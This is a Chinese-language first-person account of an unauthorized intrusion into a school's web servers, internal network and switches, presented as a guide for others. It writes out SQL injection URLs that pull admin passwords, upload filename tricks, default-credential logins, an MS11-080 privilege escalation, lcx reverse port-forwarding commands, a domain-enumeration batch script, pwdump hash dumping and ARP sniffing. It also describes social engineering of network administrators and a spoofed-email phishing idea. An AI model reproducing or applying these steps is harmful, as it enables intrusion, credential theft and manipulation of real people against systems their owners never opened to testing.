我记得在校的时候某校的领导以及老师来到我们学校参观，虽然我见到对方学校的领导我会非常有礼貌的打招呼，一次回到家里的时候，出于友谊，决定为此国家重点级的学校进行友情的“招呼”！

国家级重点级，相对震精的学校，最近我在看《黑客与画家》，里面第一篇的内容是“为什么书呆子不受欢迎”，有段作者是说公立的学校的老师就像监狱里的狱卒，除了防止你打架做坏事之外，都不会管你！我就得说得非常好！作为国家级重点级的学校，这也是更加的！好了，不说题外话了，这篇文章是以前“招呼”的了！所以现在写下来，给大家参考下，虽然不是很好，但是各位也不要喷我吧！

我重申一次，我确实是个贱人

0x00

作为国家级的重点学校，我听说他的服务器是ZF给的，买了200W左右，当然我也参观过，虽然外表看不出来，我想那个网管老师也不会吹牛B吧，就是这样才出于好奇心，才弄得！

为了防止被万人骑，所以部分过滤了！

手握神器，开始动工！这次的“招呼”任务我会在win下进行，当然如果需要的情况下，我会使用win+linux交互渗透！

0x01

踩点。

作为一个国家级的重点学校，我相信安全也是非常好的！起码也是服务器独立域名，内网等吧！收集下信息，我会采用某社工神器这个软件我非常喜欢

说下他的用途吧，适用大型渗透适用

有各种信息的收集，不懂E文的朋友，可能会比较亏哦！这个工具其实已经融入了bt5系列了，呵呵，说下现在收集到的情况吧。Win03+iis6.0+内网+C段一个站，无CDN，asp+php+aspx，C段的站是asp+aspx+win03+iis6.0+内网！招聘站一个，三台服务器的管理都是同一人，说下怎么收集的吧！首先google语法。Site:url inurl:asp|php|aspx|jsp。还有根据报错等清楚是iis，我就比较懒，火狐插件直接获得

对两台服务器进行了扫描端口与分析工作，在win下，我会选择用superscan，如果在linux下我会选择更为精准的nmap！superscan比较简单，因为在gui，直接填入IP和所需的端口就行了，如果在linux下的nmap格式就是：namp –v –a ip

得到的端口有：

21 ftp

80 www

面对以上者两个端口，可以参考的攻击思路如下：

21---爆破模式，或者社工，嗅探等。

80---iis写权限，以及脚本渗透。

有些人问，不是有php和aspx吗？！应该会扫描到1433和3306的啊！很简单，以为他不允许对外访问，或者内网，他就扫描不出了啊。

扫描了整站目录以及文件，有二级目录上的站。暂时没发现主站的后台，另一个分站是教师系统，我见过那些老师是在上面进行公告浏览以及发布什么规定的地方。

根据网站上留下来的QQ以及姓名的某个字

社工得到网站管理的部分资料

常用密码怎么知道的？！很简单，拿出你的裤，以及密码社工，马上得到！非常好！得到管理信息对之后非常有用！踩点差不多了！进行下一步工作吧！

0x02

战争的开始！

对于以上的信息，为我们的战争的做好了充分的准备，对于初期的脚本初探，对于大站我会选择安全评估工具，例如：国产的jsky，国外的wvs等，这两个大家都是非常常用，对于我来说，一般我都只用些简单的工具就行了，没什么必要都很少用。主站的是asp，因为找不到后台原因，而且还有二级目录上的站，多数都站都会疏忽二级目录上的站的安全，所以我偷笑了！

经过google收集了下，非常多，而且我听说我那边的朋友说，他们学校以前给某师兄来过，所以安全应该会加固了很多！比较懒，老规矩，都是由软件去跑。呵呵！结果下来了

后台地址显示500貌似是坏了啊！如果不是坏了，就是不显示吧！反正后台页面显示正常！

来检测下吧，是asp搭建的系统，找个带参数的地方测试下注射漏洞吧！

搞注射我觉得手工比工具快，所以所以就手工来了！

http://www.XXX.com/XXX/XXX/onews.asp?id=101’ /*出错

http://www.XXX.com/XXX/XXX/onews.asp?id=101 and 1=1 /*正常

http://www.XXX.com/XXX/XXX/onews.asp?id=101 and 1=2 /*出错

http://www.XXX.com/XXX/XXX/onews.asp?id=101 order by 10 /*正常

http://www.XXX.com/XXX/XXX/onews.asp?id=101 order by 12 /*出错

http://www.XXX.com/XXX/XXX/onews.asp?id=101 order by 11 /*正常

http://www.XXX.com/XXX/XXX/onews.asp?id=101 union select 1,2,3,4,5,6,7,8,9,10,11 from admin /*显示错位，这里如果不行的就换过另外一种方法一个一个字母来猜，或者换过一个表，我比较懒，所以直接联合查询了！

http://www.XXX.com/XXX/XXX/onews.asp?id=101 union select 1,password,username,4,5,6,7,8,9,10,11 from admin /*貌似出错了，这里有个技巧，因为有后台，看后台源码，一些程序猿写网站系统的时候会把字段写在后台页面哪里，

http://www.XXX.com/XXX/XXX/onews.asp?id=101 union select 1,password,admin,4,5,6,7,8,9,10,11 from admin

震精了下，居然明文，未经过任何加密！登录后台直接拿shell去了！

居然出错了！我记得还有个上传页面哦！

根据经验这个是雷池的上传，是以get形式提交的！可以构造上传名字

uploadpic.asp?actiontype=mod&picname=miao.asp

这样，然后再浏览器里回车一下，然后上传直接改名字为miao.asp，经过多方测试，貌似改名字了，但是都是显示404，开始以为杀软非常强大，把我的所以免杀马儿都干掉了，然后改下构造页面uploadpic.asp?actiontype=mod&picname=miao.txt ，上传后得到的名字是miao.txt，这个应该不是被杀了吧！上传后发现还是404，就觉得不对劲了，可能是上传坏了或者目录不能写了！换过其他地方来X吧。他是很多这些二三级目录的系统，都是同一种，都是去除了权限。于是就转战了招聘站。

0x03

希望被破灭！

一般来说招聘网是分为企业者和招聘者。一般都有上传头像或者企业图片的地方，我很开心，说不定能直接getshell，但是当我注册了账号进去后，貌似不好突破呢，上传都是非常严格，在经过明小子和bs改包上传都不行，这个站貌似是万企捐献的，简单来说是万企建的站，之前不是说万企有个通杀的漏洞吗，发现这里是没有的，经过一番围观，貌似看见就业论坛的字眼耶，一看是dvbbs8.3的搭建的论坛，有sql注入，不过还是先测试下默认账号密码，admin，admin888，bingo，正在登陆这个也下了，虽然有几个管理，因为留着社工管理，还是留着用。在后台拿shell 添加php就行了，在论坛上传的时候貌似404，要不被杀了，要不不可写，但是上传图片时候能显示，还有就是网上说的添加ashx，但是我是没成功过的，可能我比较倒霉````。当然本地搭建的起码成功了，我爱本地搭建的，但是不是他论坛上的shell··· 好吧，来添加看看，上传成功，根据代码，在根目录生成一个一句话后门，名为XX.asp，但是访问都是404，你妹的添加，又是没成功，我爱他，但是他还是不爱我的。现在基本失去希望了，只有返回招聘网主目录看看吧，测试着搜寻型注入等注入地方，貌似都是过滤了，看到下载中心，会不会有下载漏洞呢？！下载文件，还有登录的用户啊，真麻烦！

看到什么了吗！？我相信聪明的朋友已经看出什么了，至于他有没有做好防范呢？！这不得而知，需要实践下才能确认，貌似没有过滤耶，这时心情才好了点，根据信息，进入了后台，进去没多久就出来了- -· 居然里面非常严格，什么利用信息也没找到！

0x04

一线希望！

经过十多分钟在教师登录系统的猜测，一个也没登上，起码我蛋疼了，于是我看到了

看见开发公司了吧！至于你看不看得见，反正我看见了！于是萌发了两个方案，其中一个是社工方案，一个源码分析，于是在搜索引擎的帮助下，终于失败告终，这套系统是由此公司开发，需要1k多来购买，网上还没找到开放的源码，我晕，我再晕，我一直晕！好吧，由于第二方案比较YD，所以暂时不会用，不过说下简单思路，有个工具是伪造邮件的吧！我们可以根据伪造发给管理员，说系统升级，需要怎么怎么，你懂的！

于是先聊会天，等下整理完再来！扯扯淡，聊聊妹纸！

好了，继续工作吧！突然在google里翻呀翻，居然在主站里找到了一个XX级目录上的站，非常好！是dedecms，我们看最近爆出许许多多漏洞，我们来YYDD吧，上了杀器，貌似都返回原点了，测试那个xss的，注册用户，填好XSS getshell的信息，发送，等待管理员来认领，一天过去了，没事发生，貌似还没审核啊，于是直接加管理QQ，直接叫他来审核！过了一会上站里看看，貌似没有事情发生啊，文章虽然审核了！直接找后台，利用收集了的信息进行社工！

http://www.XXX.com/XXX/XXX/XXX/dede 貌似没有信息返回啊，怎么404，NND，继续来射吧射吧

好吧好吧，好YD的后台，但是还是阻止不了我们前进的脚步，这次没有走远，没有默认的密码，根据手头信息，一个密码一个密码地测试吧，貌似不行，继续构造，最终以“admin XXX”进入后台，后台拿shell，直接写，没有过滤，也不做解释了！在菜刀里看，我擦，居然主站没后台！你妹啊！

到webshell里看，全盘权限，ws支持，支持aspx，php，3389开着！然后就是看补丁情况，最后能直接上去一步搞到，先来一套提权方案吧！

Ws支持，试试提权exp

Mysql root权限，udf提权

sa权限，直接KO

第三方暂时没其他了。

开始在c盘放上工具，但是一直运行不了，开始以为权限问题，经过一番验证确实是，后来转到e盘，马上搞定了！udf当时测试是被删，服务器是瑞星的，没免杀，sa被降权了！最后以ms011-80搞定

然后就不连上去了，之前lcx直接反弹搞定！其他的提权都免了，好快啊！

0x05

嗅探之，结束也！

上去就想马上搞下那个什么系统来，于是嗅探了一回，彻底失望，什么也没有，上班时间，应该会流动很快才对啊，于是我就把发包率调大，还是一样，我不爱他了，cain你妹的！于是根据经验，应该安装了arp防火墙，很简单，直接不停地给网关发就行了。直接down幻境网盾，这个很好用，你基友我一直在用，我也给我的基友们一起用，我推荐大家一起用（这个貌似是成龙拍霸王的广告···），不到一回，马上来了，是吧！很好用，直接抄个账号直接登录，发现只是发邮件的功能和浏览一些管理的公告，一直没嗅探到管理账号，所以在上面找啊找，看下利用的地方，一想，发邮件应该会有上传附件的地方吧，好吧，我YD的手按了发邮件，果断有，虽然限制了 2M，但是我的几十K就够了，没过滤，完成任务，但是还是ms011-80搞定，因为方便么！直接在嗅探的机器里连接，不知道为啥手YD了，按了5下shiift，居然弹cmd窗口了，上去直接把后门删除，完毕。

0x06

最终目的。

好了，现在开始对内网进行X了，当然这也是最终的目的，内网非常大，分为二层三层交换机，经过收集很多网段，当然我的最终目的不是将他的内网全部挂马，而是拿到路由权限，然后完成对某位朋友的约定！

因为我的机器不是外网，也省得反弹，所以直接骑上肉鸡！主机上用lcx反弹，当然如果你觉得其他好用可以尝试下其他反弹工具，我只是随手拿起来能用就行了，在主机运行上：lcx –listen 51 2008 。webshell上运行： lcx.exe -slave XXX.XXX.XXX.XXX 51 192.168.8.210 3389 ，然后在主机打开远程 输入：127.0.0.1:2008 。有数据回显，表示反弹成功，

好了，连上后，我并不会去理他的配置，这个留在最后看也不会迟，首先，我会大致理解下他的拓扑结构，因为我参观过网管室，所以大概知道下情况！反正他就是至少会在三层交换机之中。

核心交换机--------三层--------二层--------路由等

现在我的目的是搞定交换机，让教室能正常上网就行了。

三个域，收集情况我会用批处理去完成这项工作

@echo off

setlocal ENABLEDELAYEDEXPANSION

@FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--" /v ^|find "Domain" /v ^|find "" /v ^|find "コマンドは正常に終了しました" /v /i`) do (

@echo =====domain:%%J========

@FOR /F "usebackq eol=; delims=, " %%i in (`net view /domain:%%J ^|findstr "\\"`) DO (

@FOR /F "usebackq eol=; tokens=1,2,3* delims=\\" %%a in (`echo %%i`) do (

@FOR /F "tokens=1,2,3,4* usebackq delims=: " %%K IN (`@ping -a -n 1 -w 100 %%a ^|findstr "Pinging"`) do (

@echo \\%%L %%M

)

)

)

)

echo %0

好了，收集差不多就动工，首先这台服务器是从80端口突破的，当然还有另一台。测试下ping其他段的机器，因为是寒假期间，所以我会选择ping交换机，经过朋友的收集情况，每天早上 6:50 到 中午 11:50 会开启

下午14:15 到 下午 16:55 会开启

晚上 18:10 到 晚上 21:30 会开启

好了,大致也了解到 交换机的启动时间 资料, 首先不知道本机出于哪个网段,是不是最高毫无妨碍呢?! 非常好, 因为当时我参观的时候 网管就是坐在 这台服务器上工作的, 朋友说平时老师上课时候要用到连接外网工作,都是由这台服务器去操作的, 所以简单来说这台是能ping通整个校园网络的! 我的现正处于的网段就是：192.168.8.1-255。 如图, 我以我朋友的教室为案例,以及隔壁班的一起：

好了，测试通过，证明这是对的，他的机器是装有瑞星套装，如果到处都ping不通，尝试下关掉防火墙。

当然，我们现在的目的是取得交互机的权限，使得教室网络解除acl限制

首先收集下本段的机器有哪些是存活的，当时我在嗅探，所以直接在cain下就能看到！

而且之前我cain的时候不只这些机器，还有其他几台

可能处于某些原因，寒假关闭了。经过一番嗅探，我获得了同网段下的 192.168.8.252 这台服务器，这台是对外开放，所以成功搞下了！ 有些人问，我的目的只是想弄到交换机的权限，为啥还有搞这么多工作呢？！ 我告诉你，知己知彼才能百战百胜，因为出于交换机要使用特权模式，而且我暂时没有射到密码，所以必须弄多几台机器，导出系统的hash，再凑合几个密码来。

好了，我们来登录另一台机器看下有啥遗留下来的有用的信息！因为这台就是内网，不用再用肉鸡反弹了！手贱的情况下，还是按了5下shift ，弹出 窗口， 不解释了， 是之前的X者遗留下来的后门，当时已经添加了用户，别理了。到时候直接删除就行了！

提权也很简单，拿shell也很简单，不多说了！

上传wce时候，发现不能使用，导出注册表的时候用cain也不能，于是搜索了下还有什么神器能用， pwdump7 ，这个使用非常简单，pwdump7.exe 1>1.txt 意思是把全部hash导出到文件根目录的1.txt 里面， 然后直接到站里破就可以了，如果有彩虹表的直接跑咯，一台跑出了

另一台跑出的是 administrator为不知道，导出有问题。那些账号密码一样的是我自己的号。然后开些轻型级的武器，扫描整个段，为啥不扫其他段呢？！ 1、这个段服务器段 2、其他段的机器也关了。好吧，配置下htscan 直接扫了。暂时未发现弱机器。好了，我们下一步，社工存活的服务器。 各种密码，各种配合 一起来搞……..几分钟过去射不出，可能那些服务器不是由同一个网管打理的吧。不理了，如果有需要的话我会直接利用漏洞导致整个校园来种马。Arp你们都会的。 telnet 192.168.27.1 这个是我朋友的教室网关，也就是交换机了。

成功。进行输入账号密码阶段。一般来说我们习惯性都是由简单到复杂来猜测的！

Admin admin 你们懂得！

这是交换机的用户模式。现在我们要想办法进入特权模式，以备开启教室网络的重要操作。

尝试完这一批之后，失败了，重新组合密码吧，孩纸，我想也没那么简单就让你这垃圾通过的！经过差不多30分钟的猜测，进去了！我的神。只有目的达到，为求不咋手段、

之后的什么全局配置模式 都是浮云了。目的达到。之后测试了其他的路由器都是统一密码。这个两层验证什么的都是傻逼，第一层都是默认，进而获得第二层密码，然而进入特权模式，之后的什么命令都能执行了，重新划分vlan等都可以实现，如果不懂交换机的朋友可以自己找资料看下！突然我发现貌似这只是二层交换机，还有三层和核心交换机，怎么怎么，现在才想到还有这些，因为大半夜，突然那个网管回话了··我擦，神马人啊，于是我就找到朋友，连夜叫醒他收集资料以及拿着手上的裤做对比，于是足足跟那个管理聊了1个半小时多，终于搞定了！看过程：

主要是利用你手头的信息，跟他一直聊天，小心露出破绽，关注他有关工作的信息，他说辞工了，好了，然后我就说我要了解几个交换机的信息，然后诱发他的欲望，而且你要装得很想学习，然后他就来了

然后就慢慢诱惑他，逼使他说出交换机什么牌子，有助于了解配置命令，然后就是机会来了！看上图，他啥都告诉我了！

0x07

折腾后的社工

继上次折腾后，不小心清除了核心交换机的特权密码，因为急着设置回去，又不小心清除了telnet后的账号密码，然后去了下WC就忘记加上密码就退出了。因为新的学期，根据社工前网管，得知他不干了，然后又来了个新网管，貌似他对于交换机的实操都是一知半解的，OH YEAH！ 然后就重新社工过吧。

在搜索引擎中，我并没有找到什么可用的资料，就只有常用账号了，只找到两个站上有他的资料，一个是贴吧，一个是什么关于QQ的论坛。没裤。然后只能加上好友，跟他聊天了，起码我知道他是那间学校毕业的，有他们学校的学生资料就行了，他的母校也正是贵校，好了，未必用裤才能完成社工，本段正是没裤的社工了。我知他技术不太行，所以为社工带来了很多方便。

因为上次我清楚了核心交换机的密码，所以导致密码为空，不能远程登录，让我觉得我手真的好贱，正好我也借此机会跟他扯上了关系。平时不懂的，直接让他问我，我找到了饭客的思科路由教程给他看，他就慢慢信任我了，当时因为他telnet不上，所以我就教他怎么修复，说修复了，让他告诉我过程，他就写了。他是装成某班的一名学生，当时说我教他修复了，让他告诉我核心交换机密码，然后让我上去耍的，他妹的，居然出尔反尔，当时气死了

然后我就冷静了下，因为社工还只是刚刚开始，我大概也能猜到，没理由这么顺心的了，但是前几天确实是这个密码，因为当时没时间，就闪人了。

之后我想办法继续射他，怎么不嗅探呢？！ 以为服务器在 xxx.xxx.8.xxx 网段，他的在其他网段，而且我也不知道他PC的段，他说过只会在机房做实验，所以放下了嗅探这个办法。然后呢，他那煞笔，居然不知道自己是内外网``内网就让他登录我的肉鸡,然后转发登录内网,外网就直接发工具,让他本地转发,目的还是一样。其实我想他登录学校的服务器,他用administrator 登录,我用自己的账号登录,然后本地嗅探,突然发觉我好贱啊,看下图

他这个煞笔，居然服务器密码都忘记了，当然我好人，当时抓了hash，破解了，帮他打上了，然后他就

NND，就看了下是不是真的进入了学校服务器，我蛋疼，就一直停留在这里，跟我扯，因为当时我远程看他的，所以就蛋疼了一晚上，还问我怎么学校同意我登录上去的，又让我说了一个善意的谎言。

当我看见telnet这几个字的时候，我激动了。跟小胖子扯了一会，然后我就一直哄他用交换机，最后还是搞定了。

当时没有截 特权模式密码的图，所以就不贴了， 嗅探时候显示有些问题，所以蛋疼了，本来想装个键盘记录的了，但是找不到好使了，所以直接嗅探了，这个贱人，让我陪了她一晚上，浪费了我的青春。多谢我亲爱的朋友配合，让我认识了贵校的领导名字 - -~~~！

0x08

总结。

爱渗透你会更爱社工，爱你妹你会更爱基友！